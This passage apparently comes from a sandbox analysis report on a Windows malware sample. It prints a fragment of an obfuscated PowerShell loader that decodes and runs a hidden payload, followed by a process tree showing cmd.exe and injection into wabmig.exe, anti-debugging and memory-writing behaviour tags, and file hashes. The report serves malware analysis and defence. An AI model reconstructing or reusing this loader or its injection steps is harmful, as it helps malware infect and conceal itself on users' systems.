orfaeRunrorBruge.UnderDmi.ieoUer.awconstnFor ultrstoo onomaNatardLys oF DechiSer nltweageClois(Drfl.$SvabrAFastipBe.rapEmporeA,kanl OmdesSub cii nicnCou ttlavnirBalleeStormrP,sta, kams$Re.ilOMillir Submireevae SplanLagentRidabe K ssrHomode V lbnHugged St,eeBlind)begre ';$Orienterende=$Navneagtig[0];Chesteine (Mekong 'Beer $GarpiGOrendln.kkeoUnderbSydfra FladLSuper: ju eUJomfrNGnaven Unc.A GenbtBesttUsy teRRetiaaWirliL Sp iIsanktSPyohet Nonsi Far.C Synf=Uncov( M anTForbeEXenacsIndskTPluto-N nbopStum aForhatMagnuhLogic haarr$SoritooppebRSandbiS eipEDa.phnInte,tSysteeKvar rPresee MastnMusicdsalt.ERend )Gene ');while (!$Unnaturalistic) {Chesteine (Mekong 'Blu,t$Oks hgCuraslCatbroPljenbKonstaFlavol chry:Voc.mRAhornyU bandLithonLokkeiSkinknPaaregklbehs Breg= oost$Cata,tTomatrCallau Selvepa.te ') ;Chesteine $Strumstrum;Chesteine (Mekong 'B tleSExedrt UdbyaElsierCarditKysha-AcetoSmiljbl eboeegu zleSortbpProje Nonce4Gled. ');Chesteine (Mekong ' Cali$ .eengP.efelImbeloOmfa b RlinaFe.rylCykel:,kjolUS lvhn Emblnsamf a Limntsha.nuGtebarfi,suaConjelSucc,iCon es LofttlustriSsonecmegat=Prepr(HeredT .ilgeSc ewsVoidetIndis-HusdyPSubsiaIndistA gomhTvegg Klren$ AdorOFortrrUnderiBestyeBl,nkn AmfitUnchreFrr,srGenopeFy ennSee adwa ereceleo)Formu ') ;Chesteine (Mekong 'Udgif$KeepbgArrasl Steeo Wit.b pru,a eksel Biog:ZeuglS Faktl demoaskiedv Un eeTumortMechaiBo ofl Hy rv Ar hrSrtr.eGtepal KontsMaxi eImplirFremtn askoeSjoflsSub e= uizz$Rece gruskrlSirb osubstbSistea WomalFoul,:SororPDermaaTriklrIntuiaMasocuPteronThioitBevgee ekspr Omst4Crawf3 Luta+Tilgr+Af,vk%Campa$fami.S PinxoFrdigr edbjb Awole VerdtMet deDissirSkrll.Abor cIndgroQuintuDigitnS.ccht Skrd ') ;$Appelsintrer=$Sorbeter[$Slavetilvrelsernes];}$Tankebanerne=312475;$Myopically=29784;Chesteine (Mekong 'Akkor$Finm g bu glCountoBusteb YaffaViderlTiffi:T,oraTS nitrS,rvio F rsmVa drbTeo,uoPandocGrae.yDataut recet Shake Un.arPreex2 Tid.1 Re.r ems=Metoa aero GCounte KonttBa de-SeborCRheosoForhanBatlotS cioetrkninAntists dde Fora$ RdhtO SubirAlkvaiFlewseFor rnparadtSalice irkerRe isesmr rnSmagedForl,eValou ');Chesteine (Mekong 'Hv lf$FremdgJournlnonlioHariob dslaaDe ialUnsan:FerryH Me liAminop Udvip hromoBrit.tErythoKuttem Cy.eiPummecAkkreaElkholsa le Landb=ber i Raspb[LithoSGrillyAstensTjr.st,leiseEndorm Prod.KofteCMyggeoGonian.robovDelume K.ogrVandft Waff]Sprut:Erhol:halvfF BerrrFord,oMatzomPdagoB estta Dasys.vatoe Flag6 Conf4 MullSKommetSimmerNachuiRuddlnShelbgStrif(U ity$fryseTclabbrA beso lyngmSt esbCaco oExinecAngekyTilprtGravetNrs ne.amalrV.ndl2Bul,e1 yper)Combl ');Chesteine (Mekong 'Tyend$Sc pog PlowlMilieoWingbbFraflaGuitalSalg :LunteUExag nLsengi StranFanossKo,mitRens r,odbauStikbmUndere Re nn tjetPlatyaSkriflArbejlH droyancha Bel e= efro Talje[CigarSn miny aagesPasitt C.lieMountmAchar. NoveTSat ne Statx Sil tImagi.centrEtelefnB inkc llenoExtemd S.amiAiramnvulvogbib.s]Trner: tact: ni rAGardnSBaffiCBlik.I Me aITilvr. UngeGparaleMi,estU cubSDkspltSi,gar moriiOufounSh ddg ukas(Beskf$Cu.hiHAdvokilogi.p VelvpFo paoForsitUdtryoTung,m Ohi i Rot c C oca nvirl Aftv)Vanvi ');Chesteine (Mekong 'Ramsh$Scri.grawi lMelleoNitr bFavrpaUngenlIrbit: VidnTFlyabr oufyForstgRatiolDelageG inerSv,nkiN nlyeUholdr KladnIn orePeriosKlatm= ergp$AsparUFravan SubdiDuellnAtte sSupint idderPistouH andmOxa ae.nbumnTi sktAfv saSuperlMontilTelegy kldt. Du esSuboruU valbforkmsTotaltUnderrBo stiManurnFrig gQuint( Bul $Bo toTAnfrtaContanTrapekTrinveBalstbTweedanringnSolbae strer.laninRotereAdven, Civi$krigsMHerr yNigh o Tekopisoz,iSmirkcPro,ea Idehl DisslTr.lvySalon)Remem ');Chesteine $Trygleriernes;"4⤵
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Apertured.Unu && echo t"5⤵
- System Location Discovery: System Language Discovery
PID:2652
-
-
C:\Program Files (x86)\windows mail\wabmig.exe"C:\Program Files (x86)\windows mail\wabmig.exe"5⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2404
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD5214d2808c1cca1d0147b64593a101473
SHA1d7f481253a7f3b02e15b482139e84330bf4f9488
SHA2569df52944ab9ae20f618e30d5729aeb735bc21c84a2ab70e290735e3390ed8bbd
SHA5124b6cfb9395b08a18963bf950a38cbf0bde20b11478dcea5b2bc45aadcb2da744d680a101651e135588c876d653049d8932dc3b29964715e21bc27942556eeea8
-
Filesize
445KB
MD5de23e8c307aeb7b1a86e2bcd803f6e8e
SHA1383ef0f85f58253f67d9956949f0f8d58ff65e4c
SHA2566bf2233f81a46ed8ac16574bde4974ad570c29fe08c5786be33a0a2978ddb228
SHA512098660526474c8609345921d6c4ecc19e8364a68dea621d29da141e2aabcf251fd0909f208d04dd69a7d3386c40ffa9fcabd51f25ca69b47ae003ffa05b37aa4
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y4ZTX1SZMANYINZB7NHJ.temp
Filesize7KB
MD5655eb40e44f525c888ae1694eee056ac
SHA14a7db7d98011c4b287fa380237b7163b9e33c87a
SHA2561808b862ba656d202cad8162f62d725918c403b321ec543bd907ce79b12cf0b0
SHA5122c15d1947dfc1f09152cf281f306c9d23b69ff19b1eb55ae7b99ac850819430a25cf6cea92795cc1dd47e707d669c9d76e630eb94be875984033aa7ca0169781